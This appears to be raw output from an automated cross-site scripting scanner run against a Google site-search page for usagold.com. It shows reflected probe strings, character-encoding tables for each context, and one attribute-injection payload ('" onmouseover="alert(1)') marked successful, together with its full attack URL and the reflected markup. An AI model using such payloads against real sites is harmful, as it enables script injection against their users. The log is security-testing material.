<a href="/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;gbv=1&amp;sei=gn6UXqr-HLKZ4-EP6_OCoA8">
<a class="gb_4 gb_5 gb_he gb_1c" href="https://accounts.google.com/ServiceLogin?hl=en&amp;passive=true&amp;continue=https://www.google.com/search%3Fsitesearch%3Dusagold.com%26q%3D(uvw%2522xyz%27yxz%253C/zxy" target="_top">
<a class="q qs" href="/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;source=lnms&amp;tbm=isch&amp;sa=X&amp;ved=2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQ_AUoAXoECAEQAw">
<a class="q qs" href="/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;source=lnms&amp;tbm=vid&amp;sa=X&amp;ved=2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQ_AUoAnoECAEQBA">
<a class="q qs" href="/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;source=lnms&amp;tbm=nws&amp;sa=X&amp;ved=2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQ_AUoA3oECAEQBQ">
<a class="f9UGee q qs" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;source=lnms&amp;tbm=bks&amp;sa=X&amp;ved=2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQ_AUoAHoECAEQBw">
<a class="f9UGee q qs" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;source=lnms&amp;tbm=fin&amp;sa=X&amp;ved=2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQ_AUoAXoECAEQCA">
<a href="/preferences?hl=en&amp;prev=https://www.google.com/search?sitesearch%3Dusagold.com%26q%3D(uvw%2522xyz%2527yxz%253C/zxy" class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" data-ved="2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQo_oBegQIARAK">
<a href="/preferences?hl=en&amp;prev=https://www.google.com/search?sitesearch%3Dusagold.com%26q%3D(uvw%2522xyz%2527yxz%253C/zxy#languages" class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" data-ved="2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQo_oBegQIARAL">
<a class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" href="/setprefs?safeui=on&amp;sig=0_rC4-U3xKkyQp6YSnvxEMC7nJmkM%3D&amp;prev=https://www.google.com/search?sitesearch%3Dusagold.com%26q%3D(uvw%2522xyz%2527yxz%253C/zxy" id="safesearch" data-ved="2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQo_oBegQIARAM">
<a href="/advanced_search?q=(uvw%22xyz'yxz%3C/zxy+site:usagold.com&amp;hl=en" class="f9UGee" jsaction="mouseover:sbHm2b" role="menuitem" tabindex="-1" data-ved="2ahUKEwiqx4m71eXoAhWyzDgGHeu5APQQo_oBegQIARAN">
<meta content="0;url=/search?q=(uvw%22xyz%27yxz%3C/zxy+site:usagold.com&amp;gbv=1&amp;sei=gn6UXqr-HLKZ4-EP6_OCoA8" http-equiv="refresh">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	False	True	True	False

Attack Payloads for ATTR
['" onmouseover="alert(1)']

ATTR Attack Url: https://www.google.com/search?sitesearch=usagold.com&q=" onmouseover="alert(1)

=> ATTACK SUCCESSFUL with Payload: " onmouseover="alert(1)
Detection of Payload: 
<input class="gLFyf gsfi" maxlength="2048" name="q" type="text" jsaction="paste:puy29d" aria-autocomplete="both" aria-haspopup="false" autocapitalize="off" autocomplete="off" autocorrect="off" role="combobox" spellcheck="false" title="Search" value='" onmouseover="alert(1) site:usagold.com' aria-label="Search" data-ved="0ahUKEwiBmPS81eXoAhWWyzgGHX8LBD8Q39UDCAk">
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	True	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	False	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	True	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
SCRIPT:		True	True	True	True	False

Attack Payloads for SCRIPT
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	True	False

Attack Payloads for URL
[]
